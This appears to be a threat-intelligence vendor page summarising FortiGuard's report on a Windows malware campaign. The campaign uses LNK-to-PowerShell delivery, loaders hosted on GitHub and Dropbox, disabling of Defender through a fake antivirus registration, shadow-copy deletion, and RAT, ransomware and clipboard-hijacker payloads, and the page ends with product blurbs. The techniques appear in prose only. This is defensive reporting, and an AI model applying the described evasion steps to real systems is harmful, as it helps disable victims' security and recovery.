Fortinet/FortiGuard researchers reported a multi-stage Windows malware campaign that relies on social engineering rather than exploiting a software vulnerability, using business-themed lures delivered in compressed archives. The initial file is a malicious .LNK shortcut crafted to look like a benign document; when opened it launches PowerShell with execution-policy bypasses to fetch a first-stage loader from cloud services (notably GitHub and Dropbox) while displaying decoy content to reduce user suspicion. Reporting indicates the chain includes staged scripts (e.g., obfuscated/encrypted VBScript reconstructed in memory) and “phone-home” signaling (including Telegram bot notifications) to confirm execution and continue payload delivery.
A key characteristic of the campaign is systematic defense evasion, including disabling or neutralizing Microsoft Defender and other Windows security controls and impairing recovery options, enabling follow-on actions such as data theft, remote access, and in some cases file encryption. Separate reporting in this set describes other, unrelated activity (FortiGate SSO bypass exploitation, a general weekly threat bulletin, Iran/Starlink connectivity issues, a watering-hole targeting EmEditor users, a China-linked espionage campaign targeting India, and generic “common threats” guidance) and does not materially change the technical picture of the FortiGuard-described Windows LNK/PowerShell multi-stage malware chain.

Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
3 events from the most recent confirmed update back to the earliest known activity.
Once defenses were neutralized, the operation deployed multiple payloads including Amnesia RAT for credential and cryptocurrency-wallet theft, Hakuna Matata ransomware for file encryption, WinLocker for desktop lockout with Russian-language ransom notes, and a clipboard hijacker to redirect cryptocurrency payments. The attackers hosted components on GitHub and Dropbox to blend malicious traffic with legitimate services.
After execution, the malware coerced Windows into disabling Microsoft Defender by registering a fake antivirus product and making extensive registry changes to turn off monitoring, add exclusions, and restrict administrative tools. It also disabled the Windows Recovery Environment, deleted backup catalogs, and removed Volume Shadow Copies to hinder recovery.
FortiGuard Labs reported a malware campaign targeting Windows systems that relies on social engineering and abuse of legitimate Windows security mechanisms rather than software exploits. The campaign used business-themed documents in compressed archives with malicious shortcut files to launch PowerShell, fetch a first-stage loader from GitHub, and show decoy documents to victims.
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
2 references tracked. Mallory keeps watching after this page renders.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.